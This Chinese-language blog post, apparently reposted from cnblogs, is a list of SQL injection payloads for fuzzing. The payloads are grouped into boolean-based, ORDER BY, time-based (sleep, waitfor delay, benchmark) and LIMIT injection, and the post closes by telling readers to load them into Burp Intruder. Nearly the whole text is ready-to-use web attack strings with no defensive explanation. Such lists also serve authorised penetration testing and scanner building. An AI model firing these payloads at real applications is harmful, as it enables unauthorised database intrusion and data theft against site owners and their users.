分享一些平时测试用的 SQL payloads


    1:BOOL SQLINJECTION


    '
    "
    %df'
    %df"
    and 1=1
    and 1=2
    ' and '1'='1
    ' and '1'='2
    " and "1"="1
    " and "1"="2
    ) and (1=1
    ) and (1=2
    ') and ('1'='1
    ') and ('1'='2
    %' and 1=1 and '%'='
    %' and 1=2 and '%'='x
    %') and 1=1 and ('%'='
    %') and 1=2 and ('%'='x
    OR 1=1
    OR 1=2
    ' OR 1=1-- -
    ' OR 1=2-- -
    ) OR 1=1-- -
    ) OR 1=2-- -
    ') OR 1=1-- -
    ') OR 1=2-- -
    " OR "1"="1
    " OR "1"="2
    ' OR '1'='1
    ' OR '1'='2
    ) OR (1=1
    ) OR (1=2
    ') OR ('1'='1
    ') OR ('1'='2

    2:ORDER BY SQLINJECTION fuzz payload

    (case when(1=1) then 1 else (select 1 union select 2) end)
    (case when(1=2) then 1 else (select 1 union select 2) end)
    ,(1-(case when(1=1) then 1 else (select 1 union select 2) end))
    ,(1-(case when(1=2) then 1 else (select 1 union select 2) end))
    ,1=if((1=1),1,(select 1 union select 2))
    ,1=if((1=2),1,(select 1 union select 2))
    ,If((1=1),1,(select 1 union select 2))-- -
    ,If((1=2),1,(select 1 union select 2))-- -
    ,If((1=1),sleep(4),(select 1 union select 2))-- -
    -IF((1=1),1,(SELECT 1 UNION SELECT 2))-- -
    -IF((1=2),1,(SELECT 1 UNION SELECT 2))-- -
    -(case when(1=1) then 1 else (select 1 union select 2) end)
    -(case when(1=2) then 1 else (select 1 union select 2) end)

    3:TIME-BASED SQLINJECTION

    '%2b(if((1=1 and sleep(4)),1,(select 1 union select 2)))%2b'a
    -IF((1=1),sleep(4),(SELECT 1 UNION SELECT 2))-- -
    ';(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
    ;SELECT sleep(4)
    );SELECT sleep(4)-- -
    ;SELECT sleep(4)-- -
    ;(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
    ' AND SLEEP(4)%23
    AND sleep(4)
    ' AND sleep(4) AND '1'='1
    ') AND sleep(4) AND ('1'='1
    ) AND sleep(4) AND (1=1
    " AND sleep(4) AND "1"="
    ') and (select(0)from(select(sleep(4)))x)-- -
    and (select(0)from(select(sleep(4)))x)
    and (select(0)from(select(sleep(4)))x) and 1=1
    ' and (select(0)from(select(sleep(4)))x) and '1'='1
    " and (select(0)from(select(sleep(4)))x) and "1"="1
    ) and (select(0)from(select(sleep(4)))x) and (1=1
    ') and (select(0)from(select(sleep(4)))x) and ('1'='1
    rlike (select(0)from(select(sleep(4)))x) and 1=1
    ' rlike (select(0)from(select(sleep(4)))x) and '1'='1
    ) rlike (select(0)from(select(sleep(4)))x) and (1=1
    ') rlike (select(0)from(select(sleep(4)))x) and ('1'='1
    ;waitfor delay '0:0:4' -- -
    ';waitfor delay '0:0:4' -- -
    );waitfor delay '0:0:4' -- -
    ');waitfor delay '0:0:4' -- -
    if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
    (SELECT * FROM(SELECT(sleep(4)))lWuP)

    4:LIMIT SQLINJECTION 

    procedure analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)

    用法就不用多说，放到 Burp Intruder 里 fuzz 就行了

  • 原文地址:https://www.cnblogs.com/depycode/p/5576204.html